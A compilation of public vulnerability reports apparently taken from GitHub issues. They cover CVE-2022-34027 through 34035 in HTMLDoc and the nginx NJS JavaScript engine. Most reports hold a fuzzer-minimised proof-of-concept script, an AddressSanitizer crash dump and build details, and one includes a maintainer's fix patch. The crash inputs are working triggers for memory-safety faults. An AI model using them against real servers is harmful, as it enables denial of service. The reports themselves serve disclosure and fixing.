HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.

Hello, I found a heap-buffer-overflow in write\_node

Reporter:  
dramthy from Topsec Alpha Lab

test platform:  
htmldoc Version ：current  
OS :Ubuntu 20.04.1 LTS aarch64  
kernel: 5.4.0-53-generic  
compiler: gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0

reproduced:

(htmldoc with asan build option)  
./htmldoc-with-asan ./poc.html  
poc.zip

    =================================================================
    ==25373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff8680cacf at pc 0xaaaadb308c50 bp 0xffffe65857c0 sp 0xffffe65857e0
    READ of size 1 at 0xffff8680cacf thread T0
        #0 0xaaaadb308c4c in write_node /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588
        #1 0xaaaadb3095d8 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:543
        #2 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #3 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #4 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #5 0xaaaadb309630 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:546
        #6 0xaaaadb30a014 in write_all /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:538
        #7 0xaaaadb30a014 in html_export /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:167
        #8 0xaaaadb2ee52c in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1291
        #9 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c)
        #10 0xaaaadb2ee984  (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984)
    
    0xffff8680cacf is located 1 bytes to the left of 1-byte region [0xffff8680cad0,0xffff8680cad1)
    allocated by thread T0 here:
        #0 0xffff8befa66c in __interceptor_strdup (/lib/aarch64-linux-gnu/libasan.so.5+0x8966c)
        #1 0xaaaadb35e684 in htmlReadFile /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmllib.cxx:796
        #2 0xaaaadb30a55c in read_file /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:2492
        #3 0xaaaadb2ee1a0 in main /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/htmldoc.cxx:1177
        #4 0xffff8b72908c in __libc_start_main (/lib/aarch64-linux-gnu/libc.so.6+0x2408c)
        #5 0xaaaadb2ee984  (/home/vm1/workspace/Projects/afl-projects/001.htmldoc/bin-with-asan-fix-malloc2calloc+0x4b984)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vm1/workspace/Projects/afl-projects/001.htmldoc/htmldoc/htmldoc/html.cxx:588 in write_node
    Shadow bytes around the buggy address:
      0x200ff0d01900: fa fa 00 06 fa fa 00 05 fa fa 00 06 fa fa 00 06
      0x200ff0d01910: fa fa 00 04 fa fa 00 05 fa fa 00 05 fa fa 00 06
      0x200ff0d01920: fa fa 00 04 fa fa 00 04 fa fa 00 05 fa fa 00 07
      0x200ff0d01930: fa fa 05 fa fa fa 00 00 fa fa 07 fa fa fa 06 fa
      0x200ff0d01940: fa fa 00 00 fa fa 04 fa fa fa 00 01 fa fa 05 fa
    =>0x200ff0d01950: fa fa 02 fa fa fa 02 fa fa[fa]01 fa fa fa 02 fa
      0x200ff0d01960: fa fa 00 05 fa fa 06 fa fa fa 03 fa fa fa 03 fa
      0x200ff0d01970: fa fa 04 fa fa fa 00 02 fa fa 00 02 fa fa 00 02
      0x200ff0d01980: fa fa 00 02 fa fa 00 02 fa fa 04 fa fa fa 04 fa
      0x200ff0d01990: fa fa 03 fa fa fa 03 fa fa fa 03 fa fa fa 00 05
      0x200ff0d019a0: fa fa 00 06 fa fa 00 05 fa fa 00 07 fa fa 00 07
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==25373==ABORTING
    
    
    

this bug in htmldoc/htmldoc/html.cxx:588:

    	  if (t->data[strlen((char *)t->data) - 1] == '\n')
                col = 0;
    

similar to

    #include <string.h>
    #include <iostream>
    int main()
    {
       const char * s = "";
       std::cout<<(int)(strlen((char *)s) - 1);
       return 0;
    }
    

the index out of bounds。

CVE-2022-34035: AddressSanitizer: heap-buffer-overflow on write_node htmldoc/htmldoc/html.cxx:588 · Issue #426 · michaelrsweet/htmldoc

Nginx NJS v0.7.4 was discovered to contain a segmentation violation via njs_value_property at njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 19, 2022

· 0 comments

**Comments**

Environment

Commit  : 6cef7f5055ec24275f0ae121c7f8709ff3e0c454
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // minified
    function f() {}                                                                                                                         
    Object.defineProperty(f, 'length', {set: () => {}});                                                                                    
    Object.defineProperty(f, 'length', Object.getOwnPropertyDescriptor([], 'length'));                                                      
    f.length  
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25984==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004ea634 bp 0x7ffdd4213270 sp 0x7ffdd42130c0 T0)
    ==25984==The signal is caused by a READ memory access.
    ==25984==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4ea634 in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19
        #1 0x521273 in njs_object_length /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_object.c:2628:11
        #2 0x600a64 in njs_promise_race /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_promise.c:1727:11
        #3 0x54c08e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:728:11
        #4 0x54a9a7 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:766:16
        #5 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #6 0x54b526 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:693:11
        #7 0x54a9b9 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:769:16
        #8 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #9 0x4f25ba in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vm.c:541:11
        #10 0x4de3fd in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:890:19
        #11 0x4dd98f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:619:11
        #12 0x4dd98f in main /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:303:15
        #13 0x7f7bafed2082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #14 0x41ea5d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-asan/build/njs+0x41ea5d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19 in njs_value_property
    ==25984==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer

May 19, 2022

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer SEGV njs\_value.c:1083:19 in njs\_value\_property

May 19, 2022

2 participants

CVE-2022-34027: SEGV njs_value.c:1083:19 in njs_value_property · Issue #504 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_value_to_number at src/njs_value_conversion.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 74595E5A-F4AD-43DB-A4E9-34F2D366AD8A
    function placeholder(){}
    function main() {
    var v0 = /gL8?/;
    var v1 = {};
    var v2 = [v1,v1,v0];
    function v4(v5) {
        v2[1866532165] = undefined;
    }
    function v6(v7,v8) {
        function v10(v11) {
            v11[-4294967297] = Map;
        }
        var v13 = new Uint16Array(v2);
    }
    v1.valueOf = v4;
    var v15 = typeof Map;
    var v17 = typeof Map;
    var v19 = new Promise(v6);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7855==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000063545b bp 0x7ffeac888710 sp 0x7ffeac8884e0 T0)
    ==7855==The signal is caused by a READ memory access.
    ==7855==Hint: address points to the zero page.
        #0 0x63545b in njs_value_to_number /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9
        #1 0x63545b in njs_typed_array_alloc /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:171:19
        #2 0x63a56b in njs_typed_array_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:229:13
        #3 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #4 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #6 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #7 0x573b65 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #8 0x573b65 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #9 0x648ed3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #10 0x648ed3 in njs_promise_constructor_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:214:11
        #11 0x648ed3 in njs_promise_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:164:15
        #12 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #13 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #14 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #17 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f8daaa33082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 in njs_value_to_number
    ==7855==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34031: SEGV src/njs_value_conversion.h:17:9 in njs_value_to_number · Issue #523 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 811225C4-281E-48F6-8D83-E65B5DB8E211
    function placeholder(){}
    function main() {
    var v0 = "WbgAtnLEGv";
    var v2 = [10000,10000,10000,10000,10000];
    var v3 = 0.0;
    var v4 = undefined;
    var v6 = v2.includes();
    var v7 = 1;
    var v10 = NaN;
    var v11 = 3269;
    var v12 = "toUpperCase";
    var v14 = String["fromCharCode"](String,1156435285,String,3269);
    var v17 = `symbol${String}undefined${v14}number${v14}byteOffset${1156435285}e`["replace"](1156435285,v14);
    var v19 = Uint8ClampedArray.from(v17);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==9418==ERROR: AddressSanitizer: SEGV on unknown address 0x62505a68846a (pc 0x000000516e19 bp 0x7ffc9f96e8f0 sp 0x7ffc9f96e890 T0)
    ==9418==The signal is caused by a READ memory access.
        #0 0x516e19 in njs_utf8_next /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9
        #1 0x516e19 in njs_string_offset /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:2539:17
        #2 0x516e19 in njs_string_slice_string_prop /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1512:21
        #3 0x5176bf in njs_string_slice /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1544:5
        #4 0x4f35dd in njs_string_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:910:16
        #5 0x4f189b in njs_object_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:693:27
        #6 0x4f189b in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:622:15
        #7 0x4ef9fe in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:1058:11
        #8 0x63b787 in njs_value_property_i64 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.h:1087:12
        #9 0x63b787 in njs_typed_array_from /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:407:15
        #10 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #11 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #13 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #14 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #15 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #16 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #17 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #18 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #19 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #20 0x7f83cfee1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #21 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 in njs_utf8_next
    ==9418==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34028: SEGV src/njs_utf8.h:52:9 in njs_utf8_next · Issue #522 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 30, 2022

· 2 comments

Assignees

**Comments**

Environment

Commit  : 9f4ebc96148308a8ce12f2b54432c87e6d78b881
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

// Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360
function placeholder(){}
function main() {
function v0(v1,v2,v3,v4,...v5) {
    try {
        async function v7(v8,v9,v10,v11) {
            var v12 \= await Proxy;
        }
        var v13 \= v0();
    } catch(v14) {
    } finally {
    }
    var v15 \= {};
    var v16 \= /gL8?/;
    var v17 \= {};
    var v18 \= \[v15,v17,v16\];
    function v20(v21) {
        v18\[1866532165\] \= Map;
    }
    async function v24(v25,v26) {
        var v27 \= await Map;
    }
    function v28(v29,v30) {
    }
    var v32 \= new Promise(v28);
    var v34 \= v32\["catch"\]();
    var v37 \= {"get":Promise,"set":v24};
    var v38 \= Object.defineProperty(v34,"constructor",v37);
    async function v39(v40,v41) {
        var v42 \= await v38;
    }
    var v43 \= v39();
    var v44 \= v20(Map);
}
var v45 \= v0();
}
main();

Minified

function run\_then() {}

function f(n) {
    if (n \== 2) {
        return;
    }

    try {
        f(n + 1);
    } catch(e) {
    }

    var p \= new Promise(run\_then);
    Object.defineProperty(p, "constructor", {get: () \=> ({}).a.a});
    async function g() {
        await p;
    }

    g();

    throw 'QQ';
}

f(0);

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0)
    ==815==The signal is caused by a READ memory access.
    ==815==Hint: address points to the zero page.
        #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12
        #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13
        #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13
        #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value
    ==815==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_scope.h:74:12 Heap-based Buffer Overflow in njs\_scope\_value SEGV njs\_scope.h:74:12 Out-of-bounds Read in njs\_scope\_value

May 30, 2022

Copy link

Contributor

** **xeioex** commented Jun 2, 2022**

The patch

# HG changeset patch
# Parent  d63163569c25cb90fe654f0fedefde43553f833a
Fixed njs\_vmcode\_interpreter() when await fails.

Previously, while interpreting a user function, njs\_vmcode\_interpreter()
might return prematurely when an error happens in await instruction.
This is not correct because the current frame has to be unwound (or
exception caught) first.

The fix is exit through only 5 appropriate exit points to ensure
proper unwinding.

The patch correctly fixes issue reported in 07ef6c1f04f1 (0.7.3).

This closes #506 issue on Github.

diff --git a/src/njs\_vmcode.c b/src/njs\_vmcode.c
\--- a/src/njs\_vmcode.c
+++ b/src/njs\_vmcode.c
@@ -858,7 +858,12 @@ next:
 
                 njs\_vmcode\_debug(vm, pc, "EXIT AWAIT");
 
\-                return njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                ret = njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                if (njs\_slow\_path(ret == NJS\_ERROR)) {
+                    goto error;
+                }
+
+                return ret;
 
             case NJS\_VMCODE\_TRY\_START:
                 ret = njs\_vmcode\_try\_start(vm, value1, value2, pc);
@@ -1923,6 +1928,7 @@ njs\_vmcode\_await(njs\_vm\_t \*vm, njs\_vmcod
 
     value = njs\_scope\_valid\_value(vm, await->retval);
     if (njs\_slow\_path(value == NULL)) {
+        njs\_internal\_error(vm, "await->retval is invalid");
         return NJS\_ERROR;
     }
 

Yes, I check the patch is valid for #506,#508,#509,#510,#511,#512,#513,#514,#515,#516,#518,#519,#520,#521,#525,#526,#527,#528. @xeioex

2 participants

CVE-2022-34029: SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value · Issue #506 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_djb_hash at src/njs_djb_hash.c.

Environment

Commit  : c756e23eb09dac519fe161c88587cc034306630f (high:1882)
Version : 0.7.5
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // Minimizing 8AC3654E-F5A1-405C-B380-951904AD058C
    function placeholder(){}
    function main() {
    var v1 = Function;
    var v6 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v8 = [v6,1050462187];
    var v11 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v13 = [v11,1050462187];
    var v15 = v11.__proto__;
    function v16(v17,v18,v19,...v20) {
        var v21 = [v17,-1000000000000.0];
        function v22(v23,v24,v25,...v26) {
            var v27 = {"d":v22};
            var v28 = Object.defineProperty(v15,v18,v27);
        }
        var v30 = v21["find"](v22);
    }
    var v32 = v13["find"](v16);
    var v34 = v6.__proto__;
    function v35(v36,v37,v38,...v39) {
        'use strict';
        var v40 = [v36,-1000000000000.0];
        var v42 = 471270.459031428 in v39;
        var v43 = 1000.0;
        var v45 = String.fromCodePoint();
        var v46 = -128;
        var v50 = `YVySS90U8G${v45}string${-452883207}-2${Uint8Array}dotAll`.indexOf();
        var v51 = 50691;
        var v52 = 658545.3967616097;
        var v53 = undefined;
        var v54 = -1.7976931348623157e+308;
        var v55 = 2147483647;
        var v56 = 4184750072;
        var v57 = "toString";
        var v58 = Float64Array;
        var v59 = "a";
        var v60 = 54444;
        var v61 = ["c14RHVOudV",1050462187];
        function v62(v63,v64,v65,...v66) {
            var v68 = v34["shift"]();
        }
        var v70 = v61["find"](v62);
        function v71(v72,v73,v74,...v75) {
            'use strict';
            var v76 = {"get":v71};
            var v77 = Object.defineProperty(v34,35017,v76);
        }
        var v79 = v40["find"](v71);
    }
    var v81 = v8["find"](v35);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2802==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e312b bp 0x7ffca2668c70 sp 0x7ffca2668c40 T0)
    ==2802==The signal is caused by a READ memory access.
    ==2802==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4e312b in njs_djb_hash /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16
        #1 0x4f10cb in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:618:32
        #2 0x502d6a in njs_vmcode_property_in /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1431:11
        #3 0x502d6a in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:492:23
        #4 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #5 0x573a55 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #6 0x573a55 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #7 0x560b05 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #8 0x560b05 in njs_array_iterator_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:1918:12
        #9 0x560b05 in njs_array_handler_find /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2025:11
        #10 0x65b9ea in njs_object_iterate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_iterator.c
        #11 0x554e0f in njs_array_prototype_iterator /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2297:11
        #12 0x57599e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:739:11
        #13 0x573d0c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:777:16
        #14 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573d3f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #17 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f1db1e4a082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 in njs_djb_hash
    ==2802==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34030: SEGV src/njs_djb_hash.c:21:16 in njs_djb_hash · Issue #540 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

Jun 1, 2022

· 0 comments

**Comments**

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 9159992D-C762-4DEB-8981-8A3357935A7A
    function placeholder(){}
    function main() {
    var v2 = [];
    var v4 = {"get":Number};
    var v6 = Object.defineProperty(v2,29425,v4);
    var v7 = AggregateError(v6);
    Object.e = v7;
    var v9 = Promise();
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==8116==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004eed5c bp 0x7ffcc19b6310 sp 0x7ffcc19b61e0 T0)
